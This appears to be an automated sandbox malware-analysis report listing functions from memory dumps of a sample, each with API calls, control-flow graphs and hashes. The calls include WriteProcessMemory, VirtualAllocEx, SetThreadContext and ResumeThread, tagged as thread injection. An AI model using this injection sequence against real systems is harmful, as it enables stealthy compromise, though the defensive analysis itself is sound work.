                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 187 7ca7ff8-7ca8046 189 7ca8048-7ca8054 187->189 190 7ca8056-7ca8095 WriteProcessMemory 187->190 189->190 192 7ca809e-7ca80ce 190->192 193 7ca8097-7ca809d 190->193 193->192
                                                                                                                                        APIs
                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07CA8088
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                        • Opcode ID: 2533061cb5b75a3437f0673b7d0496e074e2a4b972850a43a8d9be07cd87a07d
                                                                                                                                        • Instruction ID: 65de888e314fd7c32f29c50fcb17e328a30af97a2ad33f74abb6af9e2df04975
                                                                                                                                        • Opcode Fuzzy Hash: 2533061cb5b75a3437f0673b7d0496e074e2a4b972850a43a8d9be07cd87a07d
                                                                                                                                        • Instruction Fuzzy Hash: 9B2126B19003599FCF10CFA9C8847DEBBF5FF48314F448429E918A7240D7799944CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0325BAB0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 197 325bab0-325bab5 198 325bab8-325bb4c DuplicateHandle 197->198 199 325bb55-325bb72 198->199 200 325bb4e-325bb54 198->200 200->199
                                                                                                                                        APIs
                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0325BB3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                        • Opcode ID: c46c90ff372881191f263fa5b89a289ab9dfee21dd0826c44f2af7214645f65a
                                                                                                                                        • Instruction ID: db5c92f4d01daf25d05ea4a1b69038b0a46f1f7b76f61504a35e68513b33fd83
                                                                                                                                        • Opcode Fuzzy Hash: c46c90ff372881191f263fa5b89a289ab9dfee21dd0826c44f2af7214645f65a
                                                                                                                                        • Instruction Fuzzy Hash: E521E3B5900249AFDB10CF99D884ADEFBF8FB48320F15841AE914B7350D375AA54CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07CA7D70 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 203 7ca7d70-7ca7dbb 205 7ca7dcb-7ca7dfb SetThreadContext 203->205 206 7ca7dbd-7ca7dc9 203->206 208 7ca7dfd-7ca7e03 205->208 209 7ca7e04-7ca7e34 205->209 206->205 208->209
                                                                                                                                        APIs
                                                                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 07CA7DEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1591575202-0
                                                                                                                                        • Opcode ID: 53c417055cd953c7b35b8733a5da706bf2e07264fd938d6e040b17c2dda44a4b
                                                                                                                                        • Instruction ID: 7dfd9c1d4fe4dc700006228d54958e47f7165b3032f27cf8d33299f3baa5a1df
                                                                                                                                        • Opcode Fuzzy Hash: 53c417055cd953c7b35b8733a5da706bf2e07264fd938d6e040b17c2dda44a4b
                                                                                                                                        • Instruction Fuzzy Hash: 6D2138B1D003499FCB10CFAAC4847EEBBF4AF48328F148429D519A7240DB78AA45CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07CA8118 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 213 7ca8118-7ca81a5 ReadProcessMemory 216 7ca81ae-7ca81de 213->216 217 7ca81a7-7ca81ad 213->217 217->216
                                                                                                                                        APIs
                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07CA8198
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                        • Opcode ID: 8e2d642d367051c7c733eac1583dfa14725a5201a39f9ca0fd4825c747b80244
                                                                                                                                        • Instruction ID: 17d6c60206c631fe5279d98ef34fb41c7eb354e877fefff1a8bee9c12c3627ba
                                                                                                                                        • Opcode Fuzzy Hash: 8e2d642d367051c7c733eac1583dfa14725a5201a39f9ca0fd4825c747b80244
                                                                                                                                        • Instruction Fuzzy Hash: 1E2128B19003599FCF00DFA9C884ADEFBF5FF48314F518429E618A7240D7799944DBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0325BAB8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 221 325bab8-325bb4c DuplicateHandle 222 325bb55-325bb72 221->222 223 325bb4e-325bb54 221->223 223->222
                                                                                                                                        APIs
                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0325BB3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                        • Opcode ID: bd9859f1bf4a56ebabfb32809e88825f9c0fac167236fe3849973e82312f80bd
                                                                                                                                        • Instruction ID: e4dcf33e2f79b777648c6f0eff05c4ba388e0b42b37f8efb7a071c7470ff62ed
                                                                                                                                        • Opcode Fuzzy Hash: bd9859f1bf4a56ebabfb32809e88825f9c0fac167236fe3849973e82312f80bd
                                                                                                                                        • Instruction Fuzzy Hash: 7421C2B59002499FDB10CFA9D884ADEFBF8FB48324F14841AE914A7350D375AA54CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 03259A08 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 226 3259a08-3259a50 227 3259a52-3259a55 226->227 228 3259a58-3259a87 LoadLibraryExW 226->228 227->228 229 3259a90-3259aad 228->229 230 3259a89-3259a8f 228->230 230->229
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03259869,00000800,00000000,00000000), ref: 03259A7A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: dfc92cafb3dd4345c8a312263c0938ded779ac2662d411fe58da11868a17321a
                                                                                                                                        • Instruction ID: 25b3c6aef1dd893d48361c5c1aca753619f6e7498b77da574ee100b1879fafdc
                                                                                                                                        • Opcode Fuzzy Hash: dfc92cafb3dd4345c8a312263c0938ded779ac2662d411fe58da11868a17321a
                                                                                                                                        • Instruction Fuzzy Hash: 6521D6B5D00249DFDB10CFA9D484ADEFBF4EB88314F14852AE919A7200C379A585CFA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 032588D8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 233 32588d8-3259a50 235 3259a52-3259a55 233->235 236 3259a58-3259a87 LoadLibraryExW 233->236 235->236 237 3259a90-3259aad 236->237 238 3259a89-3259a8f 236->238 238->237
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03259869,00000800,00000000,00000000), ref: 03259A7A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: a6b480ea462d78953b295921b572bdb29e5fbeaec6b85088b5e766a2e8fcb715
                                                                                                                                        • Instruction ID: 1bf50070648ec83fe5e597bb7e6a71bcf845d3745cc0cb2185ca818318285d88
                                                                                                                                        • Opcode Fuzzy Hash: a6b480ea462d78953b295921b572bdb29e5fbeaec6b85088b5e766a2e8fcb715
                                                                                                                                        • Instruction Fuzzy Hash: 5311D3B6900349DFDB10CF9AC444ADEFBF4AB48314F14842AE919B7200C375A985CFA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07CA7F08 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 241 7ca7f08-7ca7f83 VirtualAllocEx 244 7ca7f8c-7ca7fb1 241->244 245 7ca7f85-7ca7f8b 241->245 245->244
                                                                                                                                        APIs
                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07CA7F76
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 73ec0851c1df262a3786954d7632b9867f0208ae6649b3c834078feddd754f9b
                                                                                                                                        • Instruction ID: 0b0be726daff412948449d84fb9e714a2f63759506fe262c00b0736d126e442c
                                                                                                                                        • Opcode Fuzzy Hash: 73ec0851c1df262a3786954d7632b9867f0208ae6649b3c834078feddd754f9b
                                                                                                                                        • Instruction Fuzzy Hash: 061107B29002499FCF10DFA9C8447DFBBF5AF48324F148819E515A7250C775A954DFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07CA7C90 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 249 7ca7c90-7ca7cff ResumeThread 252 7ca7d08-7ca7d2d 249->252 253 7ca7d01-7ca7d07 249->253 253->252
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        • Opcode ID: 72990a959d2c5685a973165c02ed86704e6dd17da26f2e06636c236334e1f8b8
                                                                                                                                        • Instruction ID: 3a51e3d303a3106297e894c0e86a45e8ab93b780f4316a314e479f10ca5e91d4
                                                                                                                                        • Opcode Fuzzy Hash: 72990a959d2c5685a973165c02ed86704e6dd17da26f2e06636c236334e1f8b8
                                                                                                                                        • Instruction Fuzzy Hash: E3113AB1D003498BCB10DFAAC4447DEFBF4AF88328F148829D515B7240CB75A944CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 03259788 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 032597EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: 0922413da707b5721a4aa83a5b6a79f85b5f9f325c51dd415c00dacaf24175da
                                                                                                                                        • Instruction ID: 0d542a9bb7ce87c4fd5db86aaba436dbbd2b4a91fcf00a6730d5c8ee65df5339
                                                                                                                                        • Opcode Fuzzy Hash: 0922413da707b5721a4aa83a5b6a79f85b5f9f325c51dd415c00dacaf24175da
                                                                                                                                        • Instruction Fuzzy Hash: F511DFB5D007498FDB10CF9AD444BDEFBF8AB88224F14852AE819A7600D375A685CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0183D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7afd33ad35d1dd841fbfd7da1638268aa1b243330217a932b5ff669c9a7765e0
                                                                                                                                        • Instruction ID: 2917ffaf0d274ce794d2f04423c3a24101127c02141d20d7bb85de7315f05eb3
                                                                                                                                        • Opcode Fuzzy Hash: 7afd33ad35d1dd841fbfd7da1638268aa1b243330217a932b5ff669c9a7765e0
                                                                                                                                        • Instruction Fuzzy Hash: 6E2103B2504244EFDB11DF54D8C0B2ABF65FBC8328F68C669E9058B247C336D956CAE1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0184D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 235df6b4cd6d61dbbbc39c93e22e773188e4ebd6c80fc405396ef3ae16d97df3
                                                                                                                                        • Instruction ID: d5742540d689698d9a6bd7884f03088c39b5d300fb3b90f907163848536d7842
                                                                                                                                        • Opcode Fuzzy Hash: 235df6b4cd6d61dbbbc39c93e22e773188e4ebd6c80fc405396ef3ae16d97df3
                                                                                                                                        • Instruction Fuzzy Hash: 5E213771604348EFDB01DF94C5C0B26BBA1FB84328F20C76DE9098B346CB36E906CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0184D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e4d29fa8db24db5720e54c8388d7152d917b2f614e129f3458fdf8f47037f7ce
                                                                                                                                        • Instruction ID: f0390a7bd68adcdce4dc1cf3a848675657738a1087a87baa007d43ce0d1053fe
                                                                                                                                        • Opcode Fuzzy Hash: e4d29fa8db24db5720e54c8388d7152d917b2f614e129f3458fdf8f47037f7ce
                                                                                                                                        • Instruction Fuzzy Hash: A8213771504348DFCB15DF94D4C0B26BB61FB94358F20C66DE9098B346CB3AD907CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0183D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5bf02d69050becd3d46a1a83d3057079996056aa0a7a8d5a39dcc4e83b01ae8c
                                                                                                                                        • Instruction ID: 724ff531289f8917dcb63ca8f4eb9037b10ea02a1aaf336a7a5f1e8d7d7e9ea4
                                                                                                                                        • Opcode Fuzzy Hash: 5bf02d69050becd3d46a1a83d3057079996056aa0a7a8d5a39dcc4e83b01ae8c
                                                                                                                                        • Instruction Fuzzy Hash: E411E172504280DFCB02CF54D5C0B16BF71FB84324F28C6A9E8044B656C33AD55ACBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0184D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
                                                                                                                                        • Instruction ID: d01060aea45babe8177b35db272c1c8eb187684f2316b00c7889b45beac5cbc7
                                                                                                                                        • Opcode Fuzzy Hash: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
                                                                                                                                        • Instruction Fuzzy Hash: 5411BB75504284DFCB12CF54D5C4B15BBA1FB84324F28C6AAD8098B656C33AD54ACBA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0184D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
                                                                                                                                        • Instruction ID: a7cae0789dc28972f3722930a023235d9bb627ba3f25520a26b2d523966a84b6
                                                                                                                                        • Opcode Fuzzy Hash: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
                                                                                                                                        • Instruction Fuzzy Hash: 2011BB75904284DFCB02DF54C5C4B15BBA1FB84324F28C6A9D8498B656C33AE44ACB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0183D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3d36d2055a8dbeba7e159c79c3c93ddc663cd35d36a09215ef979aecc2a4c36f
                                                                                                                                        • Instruction ID: d1c3daa38b320fa959a7a694585c40ede1468395a56e6377ed8d85b95bce804d
                                                                                                                                        • Opcode Fuzzy Hash: 3d36d2055a8dbeba7e159c79c3c93ddc663cd35d36a09215ef979aecc2a4c36f
                                                                                                                                        • Instruction Fuzzy Hash: 44012B714083C49AE7125E65CCC4B6ABF9CEF81378F4CC65AEE049B246D3799944CAF1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07C901B1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 259f96b033868cb4a618f27a4df6538bc91094a3082aff60b89c94057fa69e98
                                                                                                                                        • Instruction ID: 97a1e2fa6dfd3855f853b3f691f01fa1de42acaa0c266b87626cee4909bb5b04
                                                                                                                                        • Opcode Fuzzy Hash: 259f96b033868cb4a618f27a4df6538bc91094a3082aff60b89c94057fa69e98
                                                                                                                                        • Instruction Fuzzy Hash: 6CF0AFF5D4434AABDFD1EFB8E84979E7FE0AB11200F408866D454E2202E77496959B41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0183D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 36eba70fcde5bf537dcaa8b5bc9963f4059e7bef770b230a059bc90b69d6bbd7
                                                                                                                                        • Instruction ID: bd61cc2bd165ccf68f9c2e5bb4576da4672ce1fde6b84ced8ae237e4a043f70c
                                                                                                                                        • Opcode Fuzzy Hash: 36eba70fcde5bf537dcaa8b5bc9963f4059e7bef770b230a059bc90b69d6bbd7
                                                                                                                                        • Instruction Fuzzy Hash: E8F062714053C49AEB118E5ADCC4B66FF98EB81774F18C55AED085B286C3799844CAB1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07C90120 Relevance: .0, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6e722860c7ea6820141f5a23ba3e8113d3b9b0e2229e7c4f554b82f8655ec506
                                                                                                                                        • Instruction ID: d610f7edb037f7f8e854b195faf1b6017875465370722fbdc0e41a1cbc779095
                                                                                                                                        • Opcode Fuzzy Hash: 6e722860c7ea6820141f5a23ba3e8113d3b9b0e2229e7c4f554b82f8655ec506
                                                                                                                                        • Instruction Fuzzy Hash: FFF0DAB0D0430ADFDB44DFA9D846AAEBFF4BF48310F1045A9D918E7301E77096408B90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07C90110 Relevance: .0, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4f7d7ab59c544ed4f4eaffba1a2b77f0dfcb0d64a33fa2efb548365638c264af
                                                                                                                                        • Instruction ID: 9c7eeca2f6b73608cd14a67f96ec5802474dfdd30d32909ed154751bb82e4249
                                                                                                                                        • Opcode Fuzzy Hash: 4f7d7ab59c544ed4f4eaffba1a2b77f0dfcb0d64a33fa2efb548365638c264af
                                                                                                                                        • Instruction Fuzzy Hash: 34F06DF4E0434ADFEB14CF65C845AAEBFF0EF45220F0045A9E0A1D7391D77486418B81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07C900B7 Relevance: .0, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1a02c122f6f0b845973249e43da9f1853009aa90143536d1457c1d6b962d9455
                                                                                                                                        • Instruction ID: 83edf379d469e819d9aa61821ad2a6c8ad78a0d6545715369ed839a26d3c5f41
                                                                                                                                        • Opcode Fuzzy Hash: 1a02c122f6f0b845973249e43da9f1853009aa90143536d1457c1d6b962d9455
                                                                                                                                        • Instruction Fuzzy Hash: 73E092B5E403429FDB50DB78C95D94A7FF1EB09224F5586A5D0A5CB3A1EB3445039F02
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07C900C8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
